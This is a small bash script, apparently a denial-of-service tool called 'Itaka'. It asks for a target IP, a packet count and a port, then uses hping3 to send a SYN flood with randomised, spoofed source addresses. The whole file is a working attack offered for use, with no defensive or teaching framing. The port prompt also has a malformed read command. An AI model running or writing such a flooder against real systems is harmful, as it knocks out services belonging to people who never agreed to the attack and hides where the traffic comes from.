#!/bin/bash

RED='\033[31m'
BLUE='\033[34m'
NC='\033[0m'


printf "\n"
figlet  "Itaka"
echo
read -r -s -p "[itaka] IP address: " ip
printf "\n"
read -r -p "[itaka] Amount of packets: " pac
printf "\n"
read -p -r -p "[itaka] Port: " port
printf "\n"

if [[ "$ip" == "" ]]; then
	echo -e "${RED} [itaka] ERROR: IP not specified, cannot proceed ${NC}"  >&2
	exit 1
else
	if [[ "$pac" == "" ]]; then
		echo -e "${RED} [itaka] ERROR: Packet amount not specified, cannot proceed ${NC}" >&2
		exit 1
	else
		if [[ "$port" == "" ]]; then
			echo -e "${BLUE} [itaka] WARNING: Port not specified, using default ${NC}"
			sudo hping3 -c "$pac" -d 64 -S --rand-source "$ip"
		else
			sudo hping3 -c "$pac" -d 64 -S -p "$port" --rand-source "$ip"
		fi
	fi
fi
